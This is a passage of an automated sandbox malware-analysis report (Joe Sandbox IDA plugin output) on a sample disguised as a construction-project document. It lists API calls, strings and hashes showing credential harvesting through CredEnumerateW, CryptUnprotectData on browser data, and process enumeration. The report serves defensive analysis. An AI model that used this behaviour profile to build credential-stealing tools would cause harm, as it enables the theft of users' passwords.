379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                          • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                          • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                          • API String ID: 1344430650-1740548384
                                                                                                                          • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                          • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                          • String ID: AE$BIN
                                                                                                                          • API String ID: 1668488027-3931574542
                                                                                                                          • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                          • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 767404330-0
                                                                                                                          • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                          • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3558857096-0
                                                                                                                          • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                          • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                          • API String ID: 1963886904-3798722523
                                                                                                                          • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                          • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                          • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                          • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                          • String ID: chp$v10
                                                                                                                          • API String ID: 1297422669-2783969131
                                                                                                                          • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                          • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
